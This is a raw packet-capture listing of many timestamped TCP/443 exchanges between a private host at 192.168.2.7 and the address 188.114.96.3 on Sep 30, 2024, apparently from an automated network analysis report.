Sep 30, 2024 18:33:29.696932077 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.696935892 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696945906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.696976900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.696984053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697086096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697112083 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697120905 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.697127104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697161913 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.697721958 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697901964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697927952 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.697956085 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.697977066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.698012114 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.698019981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.698694944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.698721886 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.698746920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.698760033 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.698793888 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.698815107 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.699542046 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.699579954 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.699587107 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.745372057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.745415926 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788566113 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788598061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788625956 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788628101 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.788669109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788691044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.788835049 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788876057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.788882971 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.788976908 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789016962 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.789021969 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789055109 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.789397955 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789452076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.789463997 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789498091 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.789901972 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789933920 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789952040 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.789961100 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.789987087 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.790011883 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.790688038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.790740013 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.790874004 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791060925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791086912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.791094065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791105986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.791769981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791816950 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.791826963 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791862965 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.791908026 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.791949034 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.792058945 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.792100906 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.792607069 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.792666912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.880947113 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881021976 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881067991 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881119967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881237030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881278038 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881365061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881405115 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881588936 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881640911 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881808043 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881860971 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.881875038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.881916046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.882198095 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.882262945 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.882369041 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.882436037 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.882536888 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.882576942 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.882816076 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.882872105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883003950 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.883057117 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883245945 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.883275032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.883296967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883307934 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.883332014 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883348942 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883795977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.883858919 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.883960009 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884006023 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.884155989 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884206057 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884208918 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.884221077 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884246111 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.884263039 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.884727001 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884782076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.884874105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.884926081 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885082006 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.885128975 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885133982 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.885145903 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.885168076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885186911 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885565042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.885615110 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885776997 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.885835886 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.885994911 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.886025906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.886043072 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.886050940 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.886070013 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.886086941 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.973366022 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.973469973 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.973479986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.973510027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.973532915 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.973553896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.973987103 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.973995924 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.974009037 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.974045038 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.974061966 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.974080086 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.974823952 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.974838972 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.974899054 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.974915981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.975347042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.975361109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.975418091 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.975433111 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.975466967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.978235006 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978250980 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978439093 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.978466034 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978509903 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.978816986 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978831053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978883982 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.978898048 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.978931904 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.979461908 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.979475021 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.979521990 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.979537010 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.979574919 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.980123997 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.980137110 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.980189085 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:29.980199099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:29.980231047 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.085587025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.085613012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.085686922 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.085720062 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.085766077 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.086267948 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.086282015 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.086344957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.086361885 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.086401939 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.087547064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.087562084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.087620974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.087641001 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.087675095 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.087928057 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.087943077 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.088002920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.088011980 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.088049889 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.088296890 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.088311911 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.088380098 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.088387966 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.088426113 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.089081049 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.089097977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.089142084 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.089160919 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.089176893 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.089200974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.089910984 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.089927912 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.089998007 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.090007067 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.090039968 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.090280056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.090317011 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.090332031 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.090341091 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.090364933 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.090379953 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.178657055 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.178695917 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.178761005 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.178792000 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.178819895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.178869963 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.179327965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.179346085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.179416895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.179428101 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.179461002 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.180099964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.180114985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.180183887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.180193901 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.180229902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.180722952 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.180736065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.180968046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.180978060 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.181014061 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.181385040 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.181400061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.181449890 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.181463003 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.181498051 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.182128906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.182143927 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.182215929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.182229042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.182261944 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.182957888 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.182972908 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.183046103 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.183067083 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.183108091 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.183361053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.183374882 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.183425903 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.183439016 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.183487892 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.271752119 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.271843910 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.271848917 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.271883965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.271914959 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.271943092 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272176027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272222042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272249937 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272264004 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272284985 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272303104 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272737980 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272788048 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272816896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272835016 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.272854090 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.272874117 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273422956 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273463964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273494959 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273509979 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273529053 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273546934 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273830891 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273878098 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273901939 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273912907 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.273937941 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.273955107 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.274384975 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.274431944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.274455070 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.274466038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.274488926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.274506092 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.274996042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.275034904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.275065899 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.275077105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.275098085 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.275121927 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.314595938 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.314657927 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.314697981 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.314728022 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.314749002 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.314929962 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.364104986 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.364154100 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.364202023 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.364228964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.364252090 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.364273071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.364929914 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.364970922 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365005016 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365016937 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365039110 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365056992 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365540028 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365580082 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365609884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365618944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365647078 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365665913 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365901947 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365942955 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.365969896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.365983009 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.366005898 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.366025925 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.366996050 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367055893 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367075920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.367095947 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367113113 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.367131948 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.367760897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367816925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367832899 CEST	49701	443	192.168.2.7	188.114.96.3
